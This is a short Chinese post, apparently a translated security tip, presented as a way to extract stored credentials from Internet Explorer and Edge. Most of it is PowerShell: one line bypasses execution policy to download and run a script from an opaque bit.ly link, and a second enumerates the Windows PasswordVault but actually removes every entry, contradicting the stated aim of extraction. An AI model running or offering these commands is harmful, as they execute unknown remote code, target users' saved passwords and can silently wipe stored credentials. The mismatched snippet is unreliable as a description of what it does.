内容:从 Internet Explorer 和 Edge 中提取存储的凭证
作者:Florian Hansemann | @HanseSecure | https://hansesecure.de
日期:04/2018
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2K75g15')"
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | ForEach {$vault.Remove($_)}
感谢 @nongiach 提供信息
不要在浏览器中保存任何密码,使用密码管理器 ;-)
@jaredhaight 告诉我,这段代码以前已经有人用过了。我之前并不知道,但我想添加那篇文章的链接:https://www.toddklindt.com/blog/_layouts/mobile/dispform.aspx?List=56f96349-3bb6-4087-94f4-7f95ff4ca81f&ID=606
我认为代码越小,开发出“旧”东西的可能性就越大。